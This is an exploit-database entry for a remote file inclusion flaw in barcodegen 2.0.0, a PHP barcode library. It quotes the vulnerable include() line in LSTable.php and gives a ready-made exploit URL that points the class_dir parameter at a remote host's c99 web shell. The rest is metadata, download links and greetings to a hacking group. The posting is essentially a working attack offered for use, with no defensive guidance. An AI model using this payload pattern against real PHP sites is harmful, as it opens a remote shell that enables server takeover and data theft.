barcodegen 2.0.0 - 'class_dir' Remote File Inclusion
Author: Br0k3n H34rT
type: webapps
platform: php
port:
date_added: 2008-09-25
date_updated: 2016-12-23
verified: 1
codes:
tags:
aliases:
screenshot_url:
application_url: http://www.exploit-db.combarcodegen.1d-php5.v2.2.0.zip
# Name : barcodegen <= 2.0.0 Remote File Inclusion Vulnerability
# Download From : http://www.barcodephp.com/processdownload.php?id=barcodegen.1d-php4.v2.0.0.zip
# Found By : Br0k3n H34rT
# Home Page : WwW.Sec-Code.CoM
============================================================================
# Vulne Code : In File : LSTable.php In Line 21 :
include( $class_dir.'/Table_template.php' );
# Exploit :
http://WwW.Sec-Code.CoM/barcodegen.1d-php4.v2.0.0/class/LSTable.php?class_dir=http://SITE.COM/shell/c99.txt?
============================================================================
# Greet To :
My Master RoMaNcYxHaCkEr , And All My Members
# Note : Eid Mobarak :)
# bEST wISHES
# milw0rm.com [2008-09-26]